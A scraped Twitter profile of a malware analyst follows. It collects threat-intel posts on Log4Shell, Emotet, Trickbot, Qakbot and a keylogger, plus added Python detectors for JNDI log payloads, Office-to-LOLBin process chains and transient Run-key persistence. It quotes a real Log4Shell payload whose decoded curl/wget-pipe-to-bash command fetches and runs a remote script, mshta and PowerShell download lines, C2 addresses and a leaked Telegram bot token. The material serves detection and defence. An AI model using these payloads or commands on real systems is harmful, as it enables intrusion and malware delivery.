Malware_Kitten (@malware_kitten)'s Twitter Profile
Malware_Kitten

@malware_kitten

Malware Analyst
Reverse Engineer
Threat Hunter

ID: 837663239911706624

Joined: 03-03-2017 13:57:34

367 Tweets

89 Followers

311 Following

Florian Roth ⚡️ (@cyb3rops):

I've created a Gist with exploitation detection ideas and rules.

I'll update this gist frequently.

#log4j #log4jrce CVE-2021-44228

gist.github.com/Neo23x0/e4c8b0…
Bad Packets by Okta (@bad_packets):

Example CVE-2021-44228 payload:
${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}

Decoded:
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash

Source IP:
62.76.41.46 (🇷🇺)
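The payload above is the `/Basic/Command/Base64/<b64>` form used by common Log4Shell exploit kits: the JNDI lookup points at an attacker LDAP server and the path carries the shell command, Base64-encoded. The following is an added example, not code from the tweet's author: a small Python scanner that pulls `${jndi:...}` lookups out of access-log lines, strips the `${lower:...}` / `${::-x}` nesting attackers use to hide the literal string `jndi`, and decodes the embedded command. The log lines are constructed for the example (line 1 reuses the payload quoted in the tweet; the other hosts and paths are made up); it is not a complete detection rule set.

```python
import base64
import re
from typing import List, Optional, Tuple

# Constructed web-server access log lines (not from the original post).
# Line 1 carries the exact payload quoted in the tweet above; lines 3 and 4
# use two widely documented obfuscations of the same lookup string.
SAMPLE_LOG_LINES = [
    '62.76.41.46 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://80.71.158.12:5557/Basic/Command/Base64/'
    'KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}"',
    '10.0.0.5 - - [10/Dec/2021:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9:1099/x}"',
]

# Nested lookups that evaluate to a plain string inside the outer ${jndi:...}.
# ${lower:X} / ${upper:X} change case; ${<anything>:-X} is the default-value
# syntax, so an empty or unknown key resolves to X.
OBFUSCATION_PATTERNS = [
    (re.compile(r"\$\{lower:([^{}]*)\}", re.I), lambda m: m.group(1).lower()),
    (re.compile(r"\$\{upper:([^{}]*)\}", re.I), lambda m: m.group(1).upper()),
    (re.compile(r"\$\{[^{}]*:-([^{}]*)\}"), lambda m: m.group(1)),
]

JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^}]*)\}", re.I)
B64_CMD_RE = re.compile(r"/Basic/Command/Base64/([A-Za-z0-9+/=]+)")


def normalize(value: str) -> str:
    """Resolve innermost-first until no obfuscating lookup remains."""
    prev = None
    while prev != value:
        prev = value
        for pattern, repl in OBFUSCATION_PATTERNS:
            value = pattern.sub(repl, value)
    return value


def decode_base64_command(target: str) -> Optional[str]:
    """Return the shell command carried in a /Basic/Command/Base64/ path, if any."""
    m = B64_CMD_RE.search(target)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:           # binascii.Error is a ValueError subclass
        return None


def scan_line(line: str) -> List[dict]:
    """Find every JNDI lookup in one log line, after de-obfuscation."""
    findings = []
    for m in JNDI_RE.finditer(normalize(line)):
        target = m.group(2)
        findings.append({
            "scheme": m.group(1).lower(),
            "target": target,
            "command": decode_base64_command(target),
            # True when the raw line never contained the literal "${jndi:"
            "obfuscated": "${jndi:" not in line.lower(),
        })
    return findings


def scan_log(lines: List[str]) -> List[Tuple[int, dict]]:
    """(line index, finding) for every lookup found across the log."""
    return [(idx, f) for idx, line in enumerate(lines) for f in scan_line(line)]


if __name__ == "__main__":
    for idx, finding in scan_log(SAMPLE_LOG_LINES):
        print(f"line {idx}: {finding}")
```

The de-obfuscation step matters more than the regex: a rule that only matches the literal `${jndi:` misses the third and fourth lines entirely. Decoding the command gives the second-stage download host, which is the indicator worth blocking at the egress proxy.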
GovCERT.ch (@govcert_ch):

Heads up: We see a lot of scanning against the #log4j vulnerability and decided to publish a blog post with some guidance:
govcert.ch/blog/zero-day-…

Please patch now!
Max_Malyutin (@max_mal_):

#Trickbot 🤖 new Exec Flow #DFIR:
Excel > CMD > mshta > PowerShell > CMD > Rundll32 > Rundll32 (unpack) > wermgr (injection) > svchost (injection)

Stage 1 mshta
hxxp://87.251.85[.]100/love/love7[.]html

Stage 2 PS
hxxp://5.182.206[.]13/images/panther[.]png

Jazi (@h2jazi):

This #maldoc exploits CVE-2021-40444 to inject #CobaltStrike shellcode into rundll32.exe.

document.docx
79330b9f1bffdd70e33f64d9e9fbe2a8

http://188.49.118.39/word.html
5356752becd26f2c68f1802184a43582

http://188.49.118.39/word.cab
2b1a445a775ddb9419801351d5b51c9d
Ian Beer (@i41nbeer):

Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world. googleprojectzero.blogspot.com/2021/12/a-deep…

ThreatDown (@threat_down):

ℹ️ In unrelated Log4Shell news, we saw an unusual payload being dropped by #RIGEK last week.

Typically, this malvertising chain pushes #Dridex, but this time we saw a loader that fetched #Glupteba (you may recall their botnet was disrupted by Google).
Vitali Kremez (@vk_intel):

🔥[Breaking blog] Ransomware Advisory: #Log4Shell Exploitation for Initial Access & Lateral Movement

1⃣Log4Shell | 2⃣Discovery: Conti Becomes The First Sophisticated Crimeware Group Weaponizing Log4j2 | 3⃣Early Warning: Ransomware Exploitation of Vuln

advintel.io/post/ransomwar…
ThreatDown (@threat_down):

Microsoft Edge traffic from South Korea 🇰🇷 redirecting to #MagnitudeEK with social engineering scheme to deliver #Magniber ransomware.
Cryptolaemus (@cryptolaemus1):

🚨#Emotet dropping #Cobaltstrike directly again. Heads up this morning for traffic to the following location. Thanks to Anonymous and Max_Malyutin for reporting! See below 👇

proxylife (@pr0xylife):

#Emotet - ep5 - .xls > .hta > .ps > .dll

mshta hxxp://91.240.118.172/ss/hh.html

hxxp://91.240.118.172/ss/ss.png

hxxp://mkdevcorp.com/cgi/33HhffLF60pcv/

rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer

IOCs
github.com/pr0xylife/Emot…
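Both the Trickbot flow (Excel > CMD > mshta > PowerShell > CMD > Rundll32) and the Emotet ep5 chain (.xls > .hta > .ps > .dll) are the same detection problem: an Office process several generations up the tree from a LOLBin that should never descend from it. The block below is an added example, not code from either poster or from their IOC repositories. It rebuilds process ancestry from process-creation events and matches ordered signatures that allow gaps (the intermediate cmd.exe hops vary from campaign to campaign). The events are constructed: PIDs, the user name, the host 198.51.100.10 and the file names are placeholders, and the DLL name and `DllRegisterServer` export only mirror the command line quoted in the tweet.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Pattern, Set, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path, as a process-creation log records it
    cmdline: str


@dataclass
class Signature:
    name: str
    steps: List[Set[str]]                 # ordered; gaps allowed; last = the process itself
    leaf_cmdline: Optional[Pattern] = None  # extra condition on the leaf's command line


OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}

SIGNATURES = [
    Signature("office > mshta > powershell",
              [OFFICE, {"mshta.exe"}, {"powershell.exe"}]),
    Signature("office > ... > rundll32 DllRegisterServer",
              [OFFICE, {"rundll32.exe"}], re.compile(r"DllRegisterServer", re.I)),
]

PS1 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events (not from the original posts); placeholders
# throughout, shaped like the Emotet ep5 chain above.
EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1200, 400, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              '"EXCEL.EXE" C:\\Users\\alice\\Downloads\\invoice.xls'),
    ProcEvent(1300, 1200, r"C:\Windows\System32\cmd.exe",
              "cmd /c mshta http://198.51.100.10/ss/hh.html"),
    ProcEvent(1400, 1300, r"C:\Windows\System32\mshta.exe",
              "mshta http://198.51.100.10/ss/hh.html"),
    ProcEvent(1500, 1400, PS1,
              "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
              "'http://198.51.100.10/ss/ss.png','C:\\ProgramData\\Milossd.dll')"),
    ProcEvent(1600, 1500, r"C:\Windows\System32\cmd.exe",
              'cmd /c rundll32.exe "C:\\ProgramData\\Milossd.dll",DllRegisterServer'),
    ProcEvent(1700, 1600, r"C:\Windows\System32\rundll32.exe",
              'rundll32.exe "C:\\ProgramData\\Milossd.dll",DllRegisterServer'),
    # Benign look-alikes: same binaries, no Office ancestor.
    ProcEvent(2000, 400, r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent(2100, 400, PS1, "powershell -c Get-Date"),
]


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Walk ppid links from a process to its oldest known ancestor (root first)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)                     # PID reuse can create a cycle; stop there
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def matches(sig: Signature, chain: List[ProcEvent]) -> bool:
    """Leaf must be the signature's last step; earlier steps are an ordered subsequence."""
    if not chain or basename(chain[-1].image) not in sig.steps[-1]:
        return False
    if sig.leaf_cmdline and not sig.leaf_cmdline.search(chain[-1].cmdline):
        return False
    idx = 0
    for ev in chain[:-1]:
        if idx < len(sig.steps) - 1 and basename(ev.image) in sig.steps[idx]:
            idx += 1
    return idx == len(sig.steps) - 1


def detect(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """(signature name, leaf pid, rendered chain) for every matching process."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        chain = ancestry(by_pid, ev.pid)
        for sig in SIGNATURES:
            if matches(sig, chain):
                hits.append((sig.name, ev.pid, " > ".join(basename(e.image) for e in chain)))
    return hits


if __name__ == "__main__":
    for name, pid, chain in detect(EVENTS):
        print(f"[{name}] pid {pid}: {chain}")
```

Anchoring the signature on the leaf process rather than anywhere in the tree gives one alert per stage instead of one per descendant; requiring an Office ancestor is what keeps the stock `rundll32.exe shell32.dll,Control_RunDLL` from explorer.exe quiet.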
reecDeep (@reecdeep):

same actor spreads #Gozi #Ursnif #malware via #malspam themed "Agenzia delle Entrate" targeting #Italy 🇮🇹

Please pay attention!⚠️
hxxps://premiumline.top/image.txt
hxxps://premiumlist.top/image.txt

#infosec #cybersecurity #infosecurity #cyberattacks

x.com/reecdeep/statu…
Cryptolaemus (@cryptolaemus1):

🚨#Emotet Update🚨 - Looks like Ivan laid an egg for easter and has been busy. As of about 14:00UTC today 2022/04/18 - Emotet on Epoch 4 has switched over to using 64-bit loaders and stealer modules. Previously everything was 32-bit except for occasional loader shenanigans. 1/x

Unit 42 (@unit42_intel):

2022-10-12 (Wednesday) - #CobaltStrike activity caused by #IcedID (#Bokbot) infection. Cobalt Strike Stager at hxxp://mukihilama[.]com/456.dll with Cobalt Strike C2 on 23.83.133[.]97:443 using tagujog[.]com. Stager sample available at bit.ly/3MuhOA7
Max_Malyutin (@max_mal_):

#Qakbot Nasty Persistence Registry Run Key 🤖

[+] Shutdown\System Suspend; install registry run key
[+] Restart\System Wake-Up; delete registry run key value

#DFIR Boot or Logon Autostart Exec (T1547):
regsvr32.exe "C:\Users\{User}\AppData\Roaming\Microsoft\{Dir}\{Payload}.dll"
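The point of the behaviour described above is that the Run value only exists while the machine is off or asleep, so a live scan of the Run keys on a running host finds nothing. What survives is the registry event trail: a value set shortly before shutdown and deleted shortly after boot. The block below is an added example, not code from the tweet's author; it works over constructed Sysmon-style registry events (SetValue / DeleteValue with a timestamp, writing process, value path and data) and flags Run-key values on two grounds: the `regsvr32.exe <AppData\Roaming\Microsoft\...\*.dll>` shape quoted in the tweet, and a short set-to-delete lifetime. The SID, user name, directory and DLL names and the writing process are placeholders.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List


@dataclass
class RegEvent:
    ts: str            # ISO 8601 with offset, e.g. 2022-10-20T17:58:10+00:00
    event_type: str    # "SetValue" or "DeleteValue"
    image: str         # process that performed the write
    target: str        # full registry path of the value
    details: str = ""  # value data (empty for deletes)


RUN_KEY_RE = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\[^\\]+$", re.I)
# regsvr32 loading a DLL from a random directory under AppData\Roaming\Microsoft
SUSPICIOUS_CMD_RE = re.compile(
    r'regsvr32(?:\.exe)?\s+.*\\AppData\\Roaming\\Microsoft\\[^\\]+\\[^\\"]+\.dll', re.I)
TRANSIENT_MAX_SECONDS = 24 * 3600   # a legitimate Run value is not removed the next morning

# Constructed events (not from the original post); all names are placeholders.
USER_HIVE = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
EVENTS = [
    RegEvent("2022-10-20T12:00:00+00:00", "SetValue",
             r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
             USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
             r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'),
    # installed during shutdown ...
    RegEvent("2022-10-20T17:58:10+00:00", "SetValue",
             r"C:\Windows\explorer.exe",          # placeholder for the injected host process
             USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Run\Ywlfvx",
             r'regsvr32.exe "C:\Users\alice\AppData\Roaming\Microsoft\Ywlfvx\ywvpd.dll"'),
    # ... and removed right after the next logon
    RegEvent("2022-10-21T08:02:33+00:00", "DeleteValue",
             r"C:\Windows\explorer.exe",
             USER_HIVE + r"\Software\Microsoft\Windows\CurrentVersion\Run\Ywlfvx"),
    RegEvent("2022-10-21T08:05:00+00:00", "SetValue",
             r"C:\Windows\System32\svchost.exe",
             r"HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Parameters\Type", "NT5DS"),
]


def parse_ts(ts: str) -> datetime:
    return datetime.fromisoformat(ts)


def is_run_key_value(target: str) -> bool:
    return bool(RUN_KEY_RE.search(target))


def analyse(events: List[RegEvent]) -> List[dict]:
    """One finding per Run-key SetValue that looks like Qakbot-style persistence."""
    ordered = sorted(events, key=lambda e: parse_ts(e.ts))
    findings = []
    for i, ev in enumerate(ordered):
        if ev.event_type != "SetValue" or not is_run_key_value(ev.target):
            continue
        reasons = []
        if SUSPICIOUS_CMD_RE.search(ev.details):
            reasons.append("regsvr32 loading a DLL from AppData\\Roaming\\Microsoft")
        lifetime = None
        for later in ordered[i + 1:]:
            if later.event_type == "DeleteValue" and later.target.lower() == ev.target.lower():
                lifetime = int((parse_ts(later.ts) - parse_ts(ev.ts)).total_seconds())
                break
        if lifetime is not None and lifetime <= TRANSIENT_MAX_SECONDS:
            reasons.append(f"value deleted {lifetime} s after creation (transient persistence)")
        if reasons:
            findings.append({"target": ev.target, "image": ev.image, "data": ev.details,
                             "lifetime_seconds": lifetime, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(EVENTS):
        print(f["target"], f["reasons"])
```

Either reason alone is worth an alert; both together on the same value are the pattern the tweet describes. On a host without registry auditing, the same window can be covered with the offline hive copies from Volume Shadow Copies or a backup taken while the machine was down.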
reecDeep (@reecdeep):

#Snake #keylogger #malware by shellcode
➡️hxxp://208.67.105.179/tonyspecialzx.exe

🔥
1⃣SMTP
cp5ua[.hyperhost[.ua
tonyspecial[@]steuler-kch[.]org

2⃣Telegram
botid:5321688653:AAEI2yqGrOA_-sRZ3xaqutrexraSgFa0AnA
chat id: 5048077662

#CyberSec #infosec #cybercrime #infosecurity
Gameel Ali 🤘 (@malgamy12):

New #ransomware called #CatB applies some anti-analysis techniques and performs MSDTC service DLL hijacking to drop and execute its payload, so you can check my Yara rule here: github.com/MalGamy/YARA_R…